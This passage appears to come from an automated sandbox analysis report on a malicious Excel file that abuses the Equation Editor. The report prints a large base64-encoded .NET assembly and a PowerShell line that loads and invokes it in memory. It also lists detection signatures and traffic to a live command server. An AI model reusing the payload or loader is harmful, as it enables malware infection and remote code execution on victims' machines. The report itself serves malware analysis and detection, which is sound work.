JpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAE9iZnVzY2F0aW9uQXR0cmlidXRlAE15R3JvdXBDb2xsZWN0aW9uQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAWWFub0F0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAQnl0ZQBnZXRfVmFsdWUAc2V0X1ZhbHVlAEdldE9iamVjdFZhbHVlAFNldFZhbHVlAGFkZF9SZXNvdXJjZVJlc29sdmUAZ2V0X1NpemUAYnVmZmVyU2l6ZQBTaXplT2YAc3RhcnR1cF9yZWcATmV3TGF0ZUJpbmRpbmcAc2V0X0VuY29kaW5nAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcARnJvbUJhc2U2NFN0cmluZwBEb3dubG9hZFN0cmluZwBDb21wYXJlU3RyaW5nAFRvU3RyaW5nAEdldEZ1bGxQYXRoAEdldEZvbGRlclBhdGgAbGVuZ3RoAEFzeW5jQ2FsbGJhY2sARGVsZWdhdGVDYWxsYmFjawBNYXJzaGFsAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFsAFN5c3RlbS5Db21wb25lbnRNb2RlbABMYXRlQ2FsbABGaWJlci5kbGwAS2lsbABzZXRfU2VjdXJpdHlQcm90b2NvbABHZXRNYW5pZmVzdFJlc291cmNlU3RyZWFtAERlZmxhdGVTdHJlYW0AQ3J5cHRvU3RyZWFtAE1lbW9yeVN0cmVhbQBTeXN0ZW0AU3ltbWV0cmljQWxnb3JpdGhtAElDcnlwdG9UcmFuc2Zvcm0AQm9vbGVhbgBieXRlc1dyaXR0ZW4AQXBwRG9tYWluAGdldF9DdXJyZW50RG9tYWluAEdldEZpbGVOYW1lV2l0aG91dEV4dGVuc2lvbgBWZXJzaW9uAFN5c3RlbS5JTy5Db21wcmVzc2lvbgBnZXRfQXBwbGljYXRpb24ATXlBcHBsaWNhdGlvbgBwcm9jZXNzSW5mb3JtYXRpb24AU3lzdGVtLkNvbmZpZ3VyYXRpb24AU3lzdGVtLkdsb2JhbGl6YXRpb24ASW50ZXJhY3Rpb24AU3lzdGVtLlJlZmxlY3Rpb24ARXhjZXB0aW9uAEludGVybgBDb3B5VG8ARmlsZUluZm8AQ3VsdHVyZUluZm8Ac3RhcnR1cEluZm8Ac2V0X1N0YXJ0SW5mbwBQcm9jZXNzU3RhcnRJbmZvAERpcmVjdG9yeUluZm8AWmVybwBzdGFydHVwAFN5c3RlbS5MaW5xAEZpYmVyAERFU0NyeXB0b1NlcnZpY2VQcm92aWRlcgBTcGVjaWFsRm9sZGVyAEJ1ZmZlcgBidWZmZXIAZ2V0X1Jlc291cmNlTWFuYWdlcgBTZXJ2aWNlUG9pbnRNYW5hZ2VyAFJlc29sdmVFdmVudEhhbmRsZXIAZ2V0X1VzZXIAQ3VycmVudFVzZXIAVG9HZW5lcmljUGFyYW1ldGVyAEdldERlbGVnYXRlRm9yRnVuY3Rpb25Qb2ludGVyAEJpdENvbnZlcnRlcgBnZXRfQ29tcHV0ZXIATXlDb21wdXRlcgBDbGVhclByb2plY3RFcnJvcgBTZXRQcm9qZWN0RXJyb3IAQWN0aXZhdG9yAC5jdG9yAC5jY3RvcgBDcmVhdGVEZWNyeXB0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuRGV2aWNlcwBnZXRfV2ViU2VydmljZXMATXlXZWJTZXJ2aWNlcwBNaWNyb3NvZnQuVmlzdWFsQmFzaWMuQXBwbGljYXRpb25TZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBTeXN0ZW0uUmVzb3VyY2VzAEZpYmVyLk15LlJlc291cmNlcwBEZWJ1Z2dpbmdNb2RlcwBpbmhlcml0SGFuZGxlcwBHZXRGaWxlcwBHZXRNYW5pZmVzdFJlc291cmNlTmFtZXMAR2V0VmFsdWVOYW1lcwB0aHJlYWRBdHRyaWJ1dGVzAHByb2Nlc3NBdHRyaWJ1dGVzAEdldEJ5dGVzAGNyZWF0aW9uRmxhZ3MAU3RyaW5ncwBnZXRfU2V0dGluZ3MATXlTZXR0aW5ncwBSZXNvbHZlRXZlbnRBcmdzAFJlZmVyZW5jZUVxdWFscwBUb29scwBDb250YWlucwBDb252ZXJzaW9ucwBSdW50aW1lSGVscGVycwBPcGVyYXRvcnMAaFByb2Nlc3MAcHJvY2VzcwBHZXRQcm9jQWRkcmVzcwBiYXNlQWRkcmVzcwBhZGRyZXNzAHNldF9Bcmd1bWVudHMARXhpc3RzAENvbmNhdABGb3JtYXQAQ3JlYXRlT2JqZWN0AFJlbGVhc2VDb21PYmplY3QATXlQcm9qZWN0AHByb3RlY3QATGF0ZUdldABTeXN0ZW0uTmV0AExhdGVTZXQAZ2V0X0RlZmF1bHQASUFzeW5jUmVzdWx0AERlbGVnYXRlQXN5bmNSZXN1bHQAV2ViQ2xpZW50AEVudmlyb25tZW50AGVudmlyb25tZW50AFN0YXJ0AENvbnZlcnQAU3lzdGVtLlRleHQAY29udGV4dABGaWJlci5NeQBUb0FycmF5AFRvQ2hhckFycmF5AE9wZW5TdWJLZXkAUmVnaXN0cnlLZXkAU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeQBnZXRfQXNzZW1ibHkAZ2V0X1JlcXVlc3RpbmdBc3NlbWJseQBHZXRFeGVjdXRpbmdBc3NlbWJseQBBbnkAQmxvY2tDb3B5AGN1cnJlbnREaXJlY3RvcnkAUmVnaXN0cnkAb3BfRXF1YWxpdHkARW1wdHkATXlTZXR0aW5nc1Byb3BlcnR5AAAAAAAfczJ1H3caeR97Dn1Qf9KB54P3hemH/Yn4i++N64/jAQtzXHWOd1N5UntWAQNyEQENbhJV4HKJdF12CnhYAQN2FAELSsZxioyJdQt3TAEDdRIBC25HVbFXwXRfVGkBA3QQARFwMXIzi4hT5ng5elB8PVu/AQNyCwERU650X3Y3XmZfyXxVflWhEgEDdh8BEYuIcmh4BIWGXmdYYaaBgnsBA3QBAQtyW3SPVGl4UXomAQNvQQERdo14U3o7fD1+V4B5gnmErQEDb0IBEVSyc19U5FbreQd7jFthWjYBA3NOARFKxnFIc1dTaHdSXLV7Vn1KAQNwXgEDci8BCW9ecQRzFnUFAQtzXnVYdw55GHsPAXN0NnZNeCV6LHwUfhGA5YLshPKG9IjVitiM9I78kOWS9pT4lqSYq5rHnMqe9qDPosekyqbQqNqq+6zCrtiw1LLBtMa237jcute80b7jwLfC8sTrxvfIlcq7zKLOuNC00qHUpta/2Lzat9yx3vHghOKb5IABcXVWd1V5LXsVfRB/5IHtg/OF1Yf8ifOL4I3rj7CR2pP9lfKX/Jn/m/Kdvp/joc2j1KXfp4Wp46vYrcuv3bGSs5m15rfZuc671L2ev+rB7MOyxaTHu8nqy+HNis+10aHToNW/17bZu9uo3bffj+GM48QBW248cD5yNXQhdiB4OHopfDh+I4DMguqE5ob1iOaK+IzijumQ5ZLPlMKW/pj3mv+c8p7ooNKi/6TmptKo26rZrMiuwbDFsuW00LbFuMq60rzSvtHAncKRxLDGqQEJdSZ3GXkOexQBA25dAQlyXXQDdhV4CgEDcygBc3Exc051KncveRN7En0af++B9YP3hdqH24nzi/+N+o/1kf+Tp5Wkl8SZzZv1nfCfxKHNo9Ol1af4qcWr263Lr8KxwbPctdO31LnWu+C9yL/xwezD9MWax7jJpcu7zavPotGh07zVs9e02bbb8t2735jhhwFxc1R1W3cveRN7En0af++B9YPXhfKH8Ynmi+mNro/YkfuT8JXyl/2Z9Ju8nd2fz6HSo92li6fhqd6rya3Dr5Cxn7Pktde3zLnSu5y9lL/uwbTDpsW1x+jJ58uIzavPo9Gm073VuNe52a7btd2x347hwgEbdiB4KnoYfA9+FoDxgveEq4bUiOGK7ozhjuMBAQAdcSFzBHUTdxt5E3sdfRJ/xoHtg+iF4oftifiL/wEPcyd1AncZeQh7CH0Lf/ABG3EJc0R1C3cneQF7TX1Ef86B/4OqheqH5onhAR1yMHQHdhJ4GHoPfBh+LIDpguyE94bziOqK/oz5ARlxO3MXdRl3Fnk2exN9HX/hgfaD7YXph+YBG24BcB5yB3QQdgd4GHoffFN+GoD5guaEqYa3ARV2I3gYegl8Gn4agPWC04TkhvOI4QEjdiB4EHoVfBl+EID2gvCE1YboiP6K7oz/jtyQ+ZL2lPmW+wEJbhlwQHJddEUBHXECcxt1AXcdeQh7D30Wf+WB7oPohaiH7Ynyi+kBE24ucANyFHQAdhp4HHoVfAl+DAGAmXNZdSF3EXkUexh9EX/3gdGD8IX/h+SJ74usjcaP+ZH2k/CV85f2mbqb552un92hgqOJpfGnwanEq8itwa/HseGzwLXPt9S537ucvfa/qcGmw6DFo8emyerLn826z7HRoNOg1fvXi9m227ndu9+Q4cLj0eXd58jpueuY7Y/vgvGG89n1pveK+ZX7n/2b/3MBcQMkBX0HOQl3ASFxJXMbdQR3E3kTexJ9GX/EgeuD9oXjh+uJ/ovjjfyP6QEVcyB1F3cKeR17GX0Kf9CB44Pwhe4BF3QxdhJ4CnoYfA9+FoDxgveE7IboiOcBE3I+dBx2FHgLehR8Dn4QgOeC9wEXcCZyGnQbdhN4FnoMfC5+C4D4gu+E4AEJcCJyEnQDdhIBEW8bcRdzBnUYdx15FntPfUwBGXUkdx15CXsJfRN/5YHWg+yF9IftieuL6AERdB52EngLehV8GH4TgLKCsQErdSF3F3kNe0p9Sn/TgeeD8IXSh+CJ+Ivpje+P9JHRk/uV+Jfsmf+b5J3qARFyGHQQdgV4F3oefBF+TICzASFyIHQQdgN4LXoTfA9+GoDggueExoboiOeK/4zojveQ5QErcCZyHHQCdkF4TXo8fBh+C4DVguuE94biiOiK74zOjuCQ/5LnlPCW75jtARFzH3UTdwp5FHsZfRJ/s4GwASFyNHQQdgN4LXoTfA9+GoDggueExoboiOeK/4zojveQ5QEddiF4EHoJfAl+CoDggu+ExIbriOWK5IzujsqQ6QElbydxAHMddQJ3HXkqew59EX/jgeeD94X1h8WJ74vhjeGP4pHrASN1JHcdeRt7GH0uf/KB7YPnheOH+4n5i8GN64/9kf2T5pXvAQt1GHcMeR57EH0SASlzLnUBdy15FHsRfR9/8IHUg+2F44f/icWL6o3dj/WR8ZPglf+X95n0ARFuBHAUcgF0G3YSeBV6SHxPAR1wMnIBdBB2FngNeh58LX4NgO6C4ITghvSI+orKAXFzN3VMdyR5LXsVfRB/5IHtg/OF9YfUiceL5Y3tj+KR/ZPnlfmX/pnum7Kd0J/lofaj+KXgp9qpy6vBrcuvx7Hds8a13bfkucy7iL2Qv/DB7MP3xfbH+8n7y/XNks+C0bfTs9WX16vZt9vy3bvfmOGHAUF0RHYWeEF6S3xOfhmAtIK3hL2GsIjsirmMuY68kKKSpJT0lqCY+JqinK+e+aCVosakw6bBqMyqnqzOrs2w17KFAXo/JuSb3qNHvjHf2lBRT5wAAyAAAQUgAQERFQYVEiwBEgwGFRIsARIIBhUSLAESHQYVEiwBEigEIAATAAQAARwcBCABAhwDIAAIBgABEi0RMQMgAA4CHgAFEAEAHgAGFRI5ARMABhUSLAETAAcGFRI5ARMAAhMABSABARMABQACAhwcBCAAEkUGIAIBDhJFBgABEk0STQUAAQERZQQAABJtBSABARJtBAABDg4FIAIODg4EIAEODgYAAwgODgIGAAEOEYCBBAAAEVUHAAQODg4ODgYAAh0ODg4LEAEBAhUSgI0BHgAGIAEBEYCVBCABAQ4FAAIODg4FIAEBElkDIAACAwYSUQYgAhJRDgIEIAAdDgIdDg0QAQICFRKAjQEeAB4ABxUSgI0BHgAFIAIBDhwFAAEdBQ4HIAEdEoClDgQdEoClBgADDg4ODgUAAhwODgUAAQESXQMAAAEQAAccHBItDh0cHQ4dEi0dAgQAAQ4cBgADDg4cHAQAAQIOBgACHBwSLQ4ABgEcEi0OHRwdDh0SLQIdHBEACBwcEi0OHRwdDh0SLR0CAgQAAQgcCAACEoDFGBItBhABAR4AHAUAAQgSLQQAAQkIAgYOAgYYBgACCB0FCAMAAAgGAAIGHQUIDAAFARKA4QgSgOEICAUAAR0FCAIdBQQAAQgJBgABEoCRCAIdCAQAABJFBiABEoD5DgUAAR0FCwkgAhKBCR0FHQUMIAMBEoD5EoEJEYERCSACARKA+RGBGQYgAQESgPkEIAAdBQYAARJFHQUFAAICDg4FAAASgR0FIAIBHBgGIAEBEoEhBCAAHQMCHQMFIAEBHQMEIAEBCAYgAQERgTUEIAEBAgcgBAEODg4OHgcTDg4OElERVRJZDg4OElkcEl0cDg4dHB0CEl0SXQMKAQ4FCgESgKUECgESMAQKARI0BAoBEjgECgESPAQKARJABAoBEkQECgESSAQKARJMBAoBElAECgESVAQKAR4AHgcXDggIEVwRWAgIHQgICAgIAggIHQUICAgICAgdBQQHAR4ABAcBEwAECgETAAkHAwgSgPkSgP0HBwQIHQMIAwiwP19/EdUKOgi3elxWGTTgiRAxAC4AMAAuADEANQAuADAAAh4kASIHBhUSLAESDAcGFRIsARIIBwYVEiwBEh0HBhUSLAESKAMGEj0DBhJBAwYSGAMGEjADBhI0AwYSOAMGEjwDBhJAAwYSRAMGEkgDBhJMAwYSUAMGElQCBgkDBh0FAwYSRQMGHQ4EAAASDAQAABIIBAAAEh0EAAASKAQAABI9BAAAEkEFAAEBEkEEAAASGAYAAwEODg4FAAEYEA4GAAIYGBAOBxABAh4ADg4FAAEBHQUEIAASLQcQAQEeAB4ABzABAQEQHgAKIAMSgOkYEoDtHAYgAQgSgOkEIAEIGAwgBBKA6RgdCBKA7RwGIAECEoDpBiACAhgdCA4gBxKA6RgICAgIEoDtHAggBQgYCAgICBAgBxKA6RgIHQUIEAgSgO0cCCACAhAIEoDpCiAFAhgIHQUIEAgQIAcSgOkYCBAICBAIEoDtHAogAwIQCBAIEoDpCiAFAhgIEAgIEAgLIAQSgOkYCBKA7RwFIAIIGAgXIAwSgOkODhgYAgkYDhARXBARWBKA7RwMIAMCEBFcEBFYEoDpESAKAg4OGBgCCRgOEBFcEBFYCAACEkUcEoD1BQACDg4ICAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAIAAAAAAAUBAAAAACkBACQ3OTE3MkIxMy1FREJBLTQwOTYtQjcyNS04RTkyQjczMEIyQkEAAAwBAAcxLjAuMC4wAABJAQAaLk5FVEZyYW1ld29yayxWZXJzaW9uPXY0LjgBAFQOFEZyYW1ld29ya0Rpc3BsYXlOYW1lEi5ORVQgRnJhbWV3b3JrIDQuOAQBAAAACAEAAQAAAAAAYQEANFN5c3RlbS5XZWIuU2VydmljZXMuUHJvdG9jb2xzLlNvYXBIdHRwQ2xpZW50UHJvdG9jb2wSQ3JlYXRlX19JbnN0YW5jZV9fE0Rpc3Bvc2VfX0luc3RhbmNlX18AAAAdAQABAFQCFVN0cmlwQWZ0ZXJPYmZ1c2NhdGlvbgAAAAAAAgAAx8daQZ4MuF56pQUgFOBO+mQ1od3TOZRdojpUrxWsM8NTG/0f5K58SoDi7cRGVGvBkj0lZ4PELd0+zQ44MtqvE+n8M97yD+t03s9b5EiQXcvWQ9UjJZUnc5a3ps4cUXtlSm0/2ikdkkSFQLDsir1bVU0VKGm9DMau1DjOmaSU+/5BXTT7aXjUgO62Hhpc3CK/pgXU3vY9HRmYVlYjNVeF7z7sEUQY3iMgTwdZJpveYnLm/KWpM4ngfBhbFPUbvC5Ax98q353X9sh2iT8Zu0v7kN9H/n7pH1BMK6DcXtKe5FR1fYTJFcKRnzB2r8RDEoYvO6nrxp0NhFe5h2fKVIP0NtNHsCzJaHT59gwXNM0E8+7KL+bZ8tI7aRs5u78z+FsZOusMo1GhEujIrPPf6tsNAeSlIknGG6yHcPB84glyOAMZq0jodqaopQp5zqU9lGU/9z1CkWFJ5gCamckROhhmj2YOCGT+UMS7Rg9MxmOZI8C7BLBgmUFG1izZ7kAncCKQD5RtYV9zSOA4vm+7PZZRNyC8w8M13D8sTkregIU7AKVu5gwvqVaK5dOCsY2IscMm3bmKuXF8teAqOPhgI2+LIlleMJ7nGTOC4UEHkDKRiYEr/YwAZQgwnmqkHOmmGROKIJJx7LP0pOmwqALxURIw5y4DzBzYmZ5mLwbNx9t+Nf0AAAAAAAAAAGXtf2QAAAAAAgAAAGwAAABEYgAAREQAAFJTRFOJNAsbF/I2SprcbxfT/rJbAQAAAEM6XFVzZXJzXENyeXB0ZXJzQW5kVG9vbHNcRGVza3RvcFxSdW1wIE9mZmxpbmUgbmV3XGJpblxSZWxlYXNlXG9iZnVzY2F0ZWRcRmliZXIucGRiANhiAAAAAAAAAAAAAPJiAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkYgAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAAAAAAAAAAAQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFiAAADMAgAAAAAAAAAAAADMAjQAAABWAFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAEAAAAAAAAAAQAAAAAAPwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAELAIAAAEAUwB0AHIAaQBuAGcARgBpAGwAZQBJAG4AZgBvAAAACAIAAAEAMAAwADAAMAAwADQAYgAwAAAAGgABAAEAQwBvAG0AbQBlAG4AdABzAAAAAAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAAAAAAAAAAACoAAQABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAAAAAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAxAC4AMAAuADAALgAwAAAANAAKAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABGAGkAYgBlAHIALgBkAGwAbAAAACYAAQABAEwAZQBnAGEAbABDAG8AcAB5AHIAaQBnAGgAdAAAAAAAAAAqAAEAAQBMAGUAZwBhAGwAVAByAGEAZABlAG0AYQByAGsAcwAAAAAAAAAAADwACgABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABGAGkAYgBlAHIALgBkAGwAbAAAACIAAQABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAAAAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAQzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==');[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] (' ??v?}???@+@ ?@@ ??v?}??.fgjk4*?*?#:?yy ??v?}??4*?*?#:?yaa.4*?*?#:?g ??v?}??.8*??(8*??(lilag ??v?}??8*??(jorp4*?*?#:?4*?*?#:??? }??+?sp ??v?}?? ??v?}???*(??@*?','1No1me_Startup','2No3me_3tartup')) MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sheet1.xmlINDICATOR_XML_LegacyDrawing_AutoLoad_Documentdetects AutoLoad documents using LegacyDrawingditekSHen
  • 0x1e79:$s1: <legacyDrawing r:id="
  • 0x1ea1:$s2: <oleObject progId="
  • 0x1eee:$s3: autoLoad="true"

Exploits

barindex
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 204, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ewaz[1].vbs
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: RFQ PO9845.xlsxReversingLabs: Detection: 61%
Source: RFQ PO9845.xlsxAvira: detected

Exploits

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 190.90.160.170 Port: 443Jump to behavior
Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 190.90.160.170:443 -> 192.168.2.22:49183 version: TLS 1.2
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1134194116.00000000058CD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1130191648.00000000028B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: indows\System.Management.Automation.pdbpdbion.pdb< source: powershell.exe, 0000000B.00000002.1130191648.00000000028B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\CryptersAndTools\Desktop\Rump Offline new\bin\Release\obfuscated\Fiber.pdb source: powershell.exe, 0000000B.00000002.1130374733.00000000034DD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1134118287.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.1130374733.000000000308C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb' source: powershell.exe, 0000000B.00000002.1130191648.00000000028B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1130191648.00000000028B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb] source: powershell.exe, 0000000B.00000002.1130191648.00000000028B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.3380.5597612ion.pdby.resources.exes.exeI.ni.dll source: powershell.exe, 0000000B.00000002.1129822527.00000000006E6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1130191648.00000000028B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.1130191648.00000000028B6000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

Software Vulnerabilities

barindex
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 3_2_039860B9 URLDownloadToFileW,ShellExecuteW,ExitProcess,3_2_039860B9
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 3_2_0398610C ExitProcess,3_2_0398610C
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 3_2_0398602E LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,3_2_0398602E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 3_2_039860E7 ShellExecuteW,ExitProcess,3_2_039860E7
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 3_2_039860D2 ShellExecuteW,ExitProcess,3_2_039860D2
Source: global trafficDNS query: name: ayccubrimientos.com
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
